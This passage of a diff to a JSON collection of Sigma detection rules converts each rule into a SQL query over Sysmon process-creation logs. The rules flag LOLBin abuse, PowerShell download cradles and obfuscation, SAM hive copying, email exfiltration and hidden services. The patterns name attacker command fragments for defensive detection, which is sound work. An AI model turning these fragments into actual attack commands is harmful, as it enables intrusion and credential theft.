'\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR 
OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_lolbin_pester.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", + "title": "Execution in Webserver Root Folder", + "id": "35efb964-e6a5-47ad-bbcd-19661854018d", "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", "author": 
"Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" + "Various applications", + "Tools that include ping or nslookup command invocations" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_susp_execution_path_webserver.yml" }, { - "title": "New Process Created Via Wmic.EXE", - "id": "526be59f-a573-4eea-b5f7-f0973207634d", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "status": "test", - "description": "Detects new process creation using WMIC via the \"process call create\" flag", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. 
This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR 
CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_process_creation.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "Winrar Compressing Dump Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.exfiltration" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - 
"filename": "proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "title": "Network Reconnaissance Activity", + "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Always Install Elevated MSI Spawned Cmd And Powershell", - "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", + "title": "MSExchange Transport Agent Installation", + "id": "83809e84-4475-4b69-bc3e-4aad8568612f", "status": "test", - "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + 
"description": "Detects the Installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentImage LIKE '%msi%' ESCAPE '\\' AND ParentImage LIKE '%tmp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" + "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" }, { - "title": "Replace.exe Usage", - "id": "9292293b-8496-4715-9db6-37028dcda4b3", - "status": "experimental", - "description": "Detects the use of Replace.exe which can be used to replace file with another file", - "author": "frack113", + "title": "Suspicious Cabinet File Expansion", + "id": "9f107a84-532c-41af-b005-8d12a607639f", + "status": "test", + "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 
'%\\\\replace.exe' ESCAPE '\\' AND (CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE '%/F:%' ESCAPE '\\' OR CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_replace.yml" + "filename": "proc_creation_win_expand_cabinet_files.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' 
OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" - ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" - }, - { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", - "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "description": "Detects the use of NPS, a port forwarding and intranet penetration 
proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1176" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "attack.command_and_control", + "attack.t1090" ], - "filename": "proc_creation_win_browsers_chrome_load_extension.yml" - }, - { - "title": "Suspicious Sysmon as Execution Parent", - "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% 
-vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Suspicious PowerShell Invocations - Specific - ProcessCreation", + "id": "536e2947-3729-478c-9903-745aaffe60d2", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine 
LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_powershell_invocation_specific.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. 
used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": "e312efd0-35a1-407f-8439-b8d434b438a6", "status": "test", - 
"description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "description": "Detects suspicious encoded character syntax often used for defense evasion", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = 